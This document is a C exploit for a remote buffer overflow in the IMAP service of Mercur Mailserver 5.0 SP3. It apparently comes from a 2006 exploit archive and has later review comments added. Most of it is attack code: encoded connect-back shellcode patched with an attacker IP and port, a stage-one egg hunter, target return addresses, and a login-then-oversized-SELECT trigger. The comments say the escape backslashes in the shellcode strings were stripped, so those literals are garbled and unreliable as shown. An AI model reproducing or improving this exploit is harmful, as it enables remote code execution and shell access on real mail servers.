# Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
# Published : 2006-03-19
# Author : pLL
/*
* mercur.cpp
*
* Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
* Copyright (C) 2006 Javaphile Group
* http://www.javaphile.org
*
* Exploit code by : pll Ellison.Tang[at]gmail[dot]com
*
* Bug Reference:
* http://www.frsirt.com/bulletins/4332
*
*/
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
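/*
 * ConnectTo - open a blocking TCP connection to ip:port.
 *
 * ip   : host name or dotted-quad, resolved with gethostbyname().
 * port : TCP port in host byte order.
 *
 * Returns the connected SOCKET. Every failure (Winsock start-up, name
 * resolution, socket creation, connect) prints a message and calls
 * exit(-1); callers rely on this never returning on error. Winsock is
 * left initialised on success and released by Disconnect().
 *
 * Fixes over the original: SOCKET is an unsigned type on Win32, so the
 * old "socket() < 0" test could never fire - INVALID_SOCKET is the
 * documented failure value; connect() failure is compared against
 * SOCKET_ERROR; an empty h_addr_list is rejected before it is
 * dereferenced; WSACleanup() runs on the failure paths; the trailing
 * newlines lost from the message literals are restored.
 */
SOCKET ConnectTo(char *ip, int port)
{
    WSADATA wsaData;
    struct sockaddr_in host = {0};
    int nTimeout = 150000;   /* SO_RCVTIMEO on Winsock is in milliseconds */

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        printf("[-]WSAStartup failed.\n");
        exit(-1);
    }

    /* gethostbyname() returns NULL on failure; the address list may also
     * be empty, which the original code did not check before indexing */
    struct hostent *he = gethostbyname(ip);
    if (he == NULL || he->h_addr_list == NULL || he->h_addr_list[0] == NULL) {
        printf("[-]Failed to resolve '%s'.", ip);
        WSACleanup();
        exit(-1);
    }

    host.sin_family = AF_INET;
    host.sin_port = htons((unsigned short)port);
    host.sin_addr = *((struct in_addr *)he->h_addr_list[0]);

    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        printf("[-]Failed creating socket.");
        WSACleanup();
        exit(-1);
    }

    if (connect(s, (struct sockaddr *)&host, sizeof host) == SOCKET_ERROR) {
        closesocket(s);
        printf("[-]Failed connecting to host.\n");
        WSACleanup();
        exit(-1);
    }

    /* Best effort: if the timeout cannot be set, recv() simply blocks. */
    (void)setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char *)&nTimeout, sizeof nTimeout);
    return s;
}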
/*
 * Disconnect - close a socket obtained from ConnectTo() and release
 * Winsock. closesocket() must run before WSACleanup(); the return
 * values are deliberately ignored, as in the original.
 */
void Disconnect(SOCKET s)
{
    (void)closesocket(s);
    (void)WSACleanup();
}
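/*
 * PrintSc - dump a byte buffer to stdout as a C string literal made of
 * lowercase "\xNN" escapes, 16 bytes per literal line, terminated by ";".
 *
 * sc  : bytes to print (only read when len > 0).
 * len : number of bytes; a non-positive length prints an empty literal.
 *
 * Output shape:
 *   "\x01\x02...\x10"
 *   "\x11...";
 *
 * Development helper only - main() never calls it. Compared with the
 * original, the sprintf() into a 6-byte scratch buffer plus the
 * per-character isupper()/_tolower() loop is replaced by a single
 * printf() with %02x, which already emits lowercase hex and needs no
 * <ctype.h>; the opening quote is now printed even for len <= 0 so the
 * literal is always balanced; the escape backslashes that this listing
 * lost are restored.
 */
void PrintSc(unsigned char *sc, int len)
{
    putchar('"');
    for (int i = 0; i < len; i++) {
        /* Close the current literal and open the next one every 16 bytes. */
        if (i != 0 && (i % 16) == 0) {
            printf("\"\n\"");
        }
        printf("\\x%02x", sc[i] & 0xff);
    }
    printf("\";\n");
}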
/*
 * main - command-line driver.
 *
 * argv[1] target host (port 143), argv[2]/argv[3] connect-back IP and
 * port that are patched into the payload, argv[4] index into os[]
 * choosing the return address. Username/password are read from stdin.
 *
 * Review notes (tool defects, not fixed here):
 *  - "void main" is non-standard; it should return int.
 *  - gets() reads unbounded input into 20-byte stack buffers.
 *  - argv[4] is used as an array index without a range check.
 *  - recv() results are used as C strings although the buffer is not
 *    guaranteed to be NUL-terminated when the reply fills it.
 *  - As rendered on this page the string literals are not valid C: the
 *    backslashes of the escape sequences (\x.., \r\n, "\n") appear to
 *    have been stripped during extraction.
 */
void main(int argc,char* argv[])
{
    struct OSTYPE
    {
        unsigned int ret;    /* return address written into FindSc below */
        char des[255];       /* label printed in the usage listing */
    };
    /* Table is terminated by ret == 0; os[p] is indexed with p from argv[4]
     * with no bounds check, so any index other than 0..2 reads past it. */
    OSTYPE os[] = {
        {0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
        {0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
        {0xDDDDDDDD, "Debug"},
        {0, NULL}
    };
    /* Stage two: decoder stub followed by the XOR-masked payload. The
     * offsets in the comments are the byte positions patched below with
     * the connect-back address and port. */
    unsigned char shellcode[]=
    /* ip offset: 71 + 21 = 92 */
    /* port offset: 78 + 21 = 99 */
    /* 21 bytes decode */
    "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"
    "xe8xedxffxffxff"
    /* 254 bytes shellcode, xor with 0xee */
    "x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
    "x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"
    "x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"
    "x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"
    "x84xecx11xb8xfex7dx86"
    "x91xeexeexef" //ip
    "x86"
    "xecxee"
    "xeexdb" //port
    "x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"
    "xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"
    "x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"
    "xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11"
    "xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0"
    "x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b"
    "xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05"
    "x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65"
    "xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11"
    "x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37"
    "xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97";
    /* Stage one: placed just before the overwritten return address in the
     * SELECT argument; bytes 85..88 receive os[p].ret below. */
    unsigned char FindSc[]=
    "x8BxCCx80xE9x3Ex8BxF1x33xC0x40xC1xE0x0Ax04x80x8B"
    "xF8x57x33xC9xB1x3ExF3xA4x5FxFFxE7x8BxC7x04x28x50"
    "x33xC0x50x64x89x20xBAx41x47x4Fx55x33xFFx3Bx17x74"
    "x03x47xEBxF9x83xC7x04x3Bx17x74x03x47xEBxEFx83xC7"
    "x04x57xC3x8Bx54x24x0Cx33xC0xB4x10x33xDBxB3x9Cx01"
    "x04x13x33xC0xC3"
    "x90x90x90x90"
    "xEBxA5";
    /* Usage banner when fewer than four arguments are supplied. */
    if(argc < 5)
    {
        printf("Mercur IMAPD 5.0 SP3 Remote Exploitn");
        printf("-------------------------------------------n");
        printf("Usage:n");
        printf(" %s <Victim> <Connect back IP> <Connect back Port> <OsType>n", argv[0]);
        printf("nType could be:n");
        int i=0;
        while(os[i].ret)
        {
            printf(" [%d] %sn", i, os[i].des);
            i++;
        }
        return;
    }
    /* ConnectTo() exits the process on any failure, so s is valid here. */
    SOCKET s=ConnectTo(argv[1],143);
    printf("[+]Connected to target...");
    /* NOTE(review): zero-initialised once; a reply that fills all 600 bytes
     * leaves no terminating NUL for the strstr() calls below, and a shorter
     * later reply can leave stale bytes from an earlier one. */
    char szRecvBuff[600] = {0};
    if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
    {
        printf("failed!n");
        return;
    }
    else
    {
        printf("done!n");
    }
    // printf("%sn",szRecvBuff);
    /* Banner fingerprint: the server greeting is expected to contain "MERCUR". */
    if(strstr(szRecvBuff, "MERCUR") == NULL)
    {
        printf("[-]Seems not IMAP running.n");
        printf("Quiting...");
        return;
    }
    else
    {
        printf("[*]Seems IMAP running.n");
    }
    /* Connect-back address/port: inet_addr() yields network byte order;
     * atoi() gives no error reporting (strtoul would). Both values are
     * XOR-masked with the same constant the decoder comment above names
     * ("xor with 0xee") before being patched into the payload. */
    unsigned long dwCbIp=inet_addr(argv[2]);
    unsigned short q=(unsigned short)atoi(argv[3]);
    unsigned short dwCbPort=(unsigned short)q;
    dwCbIp=dwCbIp^0xEEEEEEEE;
    dwCbPort=dwCbPort^0xEEEE;
    shellcode[92] =(char) (dwCbIp & 0x000000FF);
    shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
    shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
    shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
    /* Port is stored high byte first (network order). */
    shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
    shellcode[100] =(char) (dwCbPort & 0x000000FF);
    /* gets() is unbounded: more than 19 characters overflows these
     * buffers on the attacker's own machine. fgets() with sizeof would
     * be the minimal fix. */
    char szUserName[20]={0};
    printf("[?]Username:");
    gets(szUserName);
    char szPassWord[20]={0};
    printf("[?]Passwd:");
    gets(szPassWord);
    char szLogin[]=" login ";
    /* NOTE(review): 50 bytes is too small for the worst case assembled
     * below (19 + 7 + 19 + 1 + 19 + 2 = 67 bytes), so long inputs overflow
     * szLoginInfo even though memcpy() itself is bounded. */
    char szLoginInfo[50]={0};
    unsigned char szSpace=0x20;
    char szEnd[]="rn";
    /* Assembles "<user> login <pass> <pass>CRLF": the value read as
     * "Username" is used as the IMAP tag, and the password is sent as
     * BOTH LOGIN arguments. Presumably this assumes user == password, or
     * is a bug - verify before relying on the login step. */
    memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
    int dwLen=lstrlen(szUserName);
    memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
    dwLen+=lstrlen(szLogin);
    memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
    dwLen+=lstrlen(szPassWord);
    memcpy(szLoginInfo+dwLen,&szSpace,1);
    dwLen++;
    memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
    dwLen+=lstrlen(szPassWord);
    memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
    // printf("%sn",szLoginInfo);
    printf("[+]Sending Login Info...");
    /* send() return value is not checked; a short send goes unnoticed. */
    send(s,szLoginInfo,lstrlen(szLoginInfo),0);
    if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
    {
        printf("failed!n");
        return;
    }
    else
    {
        printf("done!n");
    }
    // printf("%sn",szRecvBuff);
    /* Only "OK" anywhere in the reply is checked, not the tagged status line. */
    if(strstr(szRecvBuff, "OK") == NULL)
    {
        printf("[-]Seems not a valid user or not support IMAP.n");
        printf("Quiting...");
        return;
    }
    else
    {
        printf("[*]Seems a valid user.n");
    }
    /* Trigger: a tagged SELECT whose argument is a 999-byte line of 'A'
     * filler with FindSc ending at byte 250, CRLF at 251, the marker "AGOU"
     * at 253 and 257, the payload from 261, and a final CRLF. On the wire
     * this is an easily recognised signature: an IMAP SELECT argument of
     * roughly 1 KB consisting mostly of 0x41. */
    char szSelect[]=" select ";
    char szMagicData[1000]={0};
    memset(szMagicData,'A',sizeof(szMagicData)-1);
    memcpy(szMagicData,szUserName,lstrlen(szUserName));
    memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
    /* No range check on p: os[p] reads past the 4-entry table for p > 3. */
    int p=atoi(argv[4]);
    /* Unaligned 4-byte store through a type-punned pointer (fine on x86,
     * undefined in general); memcpy() would be the portable form. */
    *(unsigned int *)&FindSc[85] = os[p].ret;
    memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
    memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
    char szAdog[]="AGOU";
    memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
    memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
    memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
    memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
    printf("[+]Sending Magic Data To server...Good Luck!n");
    send(s,szMagicData,sizeof szMagicData-1,0);
    /* Return value ignored and the buffer may be unterminated when printed. */
    recv(s,szRecvBuff,sizeof(szRecvBuff),0);
    printf("%sn",szRecvBuff);
    Disconnect(s);
    printf("[?]Sending finished...Good luck!n");
}